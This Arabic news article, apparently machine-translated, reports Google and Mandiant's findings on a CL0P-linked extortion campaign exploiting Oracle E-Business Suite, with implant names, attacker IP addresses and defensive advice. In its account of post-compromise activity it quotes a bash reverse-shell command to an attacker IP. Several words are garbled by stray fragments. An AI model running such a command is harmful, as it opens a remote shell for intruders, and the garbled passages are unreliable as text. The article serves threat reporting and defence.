أفادت جوجل باستغلال "كميات هائلة من بيانات العملاء" في حملة ابتزاز

أعلنت جوجل عن عمليةtracواسعة النطاق لبيانات العملاء من قبل جهات خبيثة، زعمت أنها متورطة في عملية ابتزاز. tracوحدة استخبارات التهديدات في جوجل وشركة مانديانت عملية الاستغلال إلى مهاجمين قد يكونون مرتبطين بمجموعة الابتزاز CL0P.

كشفت مجموعة استخبارات التهديدات التابعة لشركة جوجل (GTIG) وشركة مانديانت عن حملة ابتزاز واسعة النطاق تستغل ثغرات أمنية في نظام أوراكل للأعمال الإلكترونية (EBS). وقد أسفرت هذه الحملة عن سرقة كميات هائلة من بيانات العملاء. وأوضحتا أن العملية بدأت في 29 سبتمبر/أيلول 2025، وشارك فيها مجموعة تدّعي ارتباطها بعلامة CL0P التجارية للابتزاز.

كشفت جوجل ومانديانت عن استغلال ثغرة أمنية غير معروفة (Zero-day) 

وبحسب تقرير جوجل، أرسل المهاجمون "كمية كبيرة" من رسائل البريد الإلكتروني إلى المديرين التنفيذيين في منظمات متعددة، زاعمين حدوث اختراقات لبيئات Oracle EBS الخاصة بهم ومهددين بنشر البيانات المسروقة ما لم يتم دفع فدية. 

تضمنت رسائل البريد الإلكتروني، المرسلة من مئات الحسابات الخارجية المخترقة، عناوين الاتصال [email protected] و [email protected]، والتي كانت مرتبطة سابقًا بموقع تسريب البيانات CL0P.

كشف تحقيق مشترك أجرته جوجل ومانديانت أن نشاط الاستغلال يعود إلى يوليو 2025، وربما يكون مرتبطًا بثغرة أمنية غير معروفة tracالآن باسم CVE-2025-61882. وفي بعض الحالات، أفادت التقارير أن المهاجمين تمكنوا من استخراج "كمية كبيرة من البيانات" من المؤسسات المتضررة.

أعلنت شركة أوراكل أنها أصلحت الثغرات الأمنية المستغلة في يوليو، لكنها أصدرت لاحقًا تحديثات طارئة في 4 أكتوبر لمعالجة ثغرات إضافية. ونصحت أوراكل عملاءها باستخدام أحدث التحديثات الأمنية الهامة، وأكدت على أهمية تحديث جميع البرامج باستمرار لمنع الاختراق.

تنشط علامة CL0P التجارية للابتزاز منذ عام 2020، وترتبط تاريخيًا بمجموعة FIN11 للجرائم الإلكترونية. وقد استهدفت سابقًا أنظمة نقل الملفات المُدارة مثل MOVEit وGoAnywhere وAccellion FTA. واتبعت تلك الحملات نمطًا مشابهًا يتمثل في الاستغلال المكثف لثغرات أمنية غير معروفة، وسرقة البيانات الحساسة، والابتزاز بعد أسابيع. 

في وقت إعداد التقريرأي ضحايا جدد من هذا الحادثdent تظهر 

زراعة أجهزة جافا المعقدة والمتعددة المراحل

جوجل ومانديانت أن المهاجمين استخدموا سلاسل استغلال متعددة تستهدف مكونات Oracle EBS، بما في ذلك UiServlet و SyncServlet، لتحقيق تنفيذ التعليمات البرمجية عن بعد وزرع عمليات زرع Java متعددة المراحل.

في يوليو 2025، رُصد نشاط مشبوه تضمن طلبات HTTP إلى /OA_HTML/configurator/UiServlet. وقد لوحظ هذا النشاط المشبوه في ثغرة أمنية أخرى ظهرت لاحقًا في مجموعة على تطبيق تيليجرام تُدعى "SCATTERED LAPSUS$ HUNTERS" 

استخدم الاستغلال المسرب العديد من التقنيات المتقدمة للسيطرة على الخوادم المستهدفة، مثل تزوير الطلبات من جانب الخادم (SSRF)، وتجاوز المصادقة، وحقن قالب XSL.

بحلول أغسطس 2025، بدأ المهاجمون باستخدام أداة أخرى تُسمى SyncServlet لإنشاء وتشغيل قوالب ضارة داخل قاعدة بيانات EBS. احتوت هذه القوالب على حمولات XSL مُشفّرة بنظام Base64، والتي قامت بتحميل برامج خبيثة مبنية على لغة Java مباشرةً في الذاكرة. 

ومن بين البرامج المزروعة التيdentبرنامج GOLDVEIN.JAVA، وهو برنامج تنزيل يسترجع حمولات المرحلة الثانية من خوادم الأوامر التي يتحكم بها المهاجم، وسلسلة متعددة الطبقات تسمى SAGE، والتي قامت بتثبيت مرشحات Java servlet الدائمة لمزيد من الاستغلال.

بعد اختراق النظام، استخدم المهاجمون حساب EBS "applmgr" لاستكشاف النظام، وجمع تفاصيل الشبكة والنظام، ثم تثبيت المزيد من الملفات الخبيثة. كما استخدم المهاجمون أوامر سطر الأوامر مثل ip addr و netstat -an و bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

تمdentعناوين IP 200.107.207.26 و 161.97.99.49 في محاولات الاستغلال، بينما تم إدراج 162.55.17.215:443 و 104.194.11.200:443 كخوادم تحكم وقيادة لحمولة GOLDVEIN.JAVA.

لم تربط GTIG العملية رسميًا بأي جماعة معروفة، لكن الحملة تشترك في أوجه تشابه مع FIN11، وهي جماعة إجرامية إلكترونية ذات دوافع مالية كانت مرتبطة سابقًا ببرنامج الفدية CL0P وعمليات سرقة البيانات واسعة النطاق. 

وأشارت شركة مانديانت أيضاً إلى أن أحد الحسابات المخترقة المستخدمة لإرسال رسائل الابتزاز الإلكترونية قد تم استخدامه في هجمات سابقة متعلقة بـ FIN11.

يُحث المستخدمون على توخي الحذر من جداول قاعدة بيانات EBS XDO_TEMPLATES_B و XDO_LOBS، وخاصة تلك التي تبدأ أسماؤها بـ "TMP" أو "DEF"، وحظر حركة مرور الإنترنت الخارجية من خوادم EBS لمنع المزيد من عمليات ابتزاز البيانات.

كما توصي المنظمات بالمراقبة الدقيقة لطلبات HTTP إلى نقاط النهاية مثل /OA_HTML/SyncServlet و /OA_HTML/configurator/UiServlet، وتحليل تفريغات الذاكرة بحثًا عن أدلة على وجود حمولات Java في الذاكرة.

حذرت جوجل من أن المجموعات المرتبطة بـ CL0P ستواصل على الأرجح تخصيص مواردها للحصول على ثغرات أمنية غير معروفة.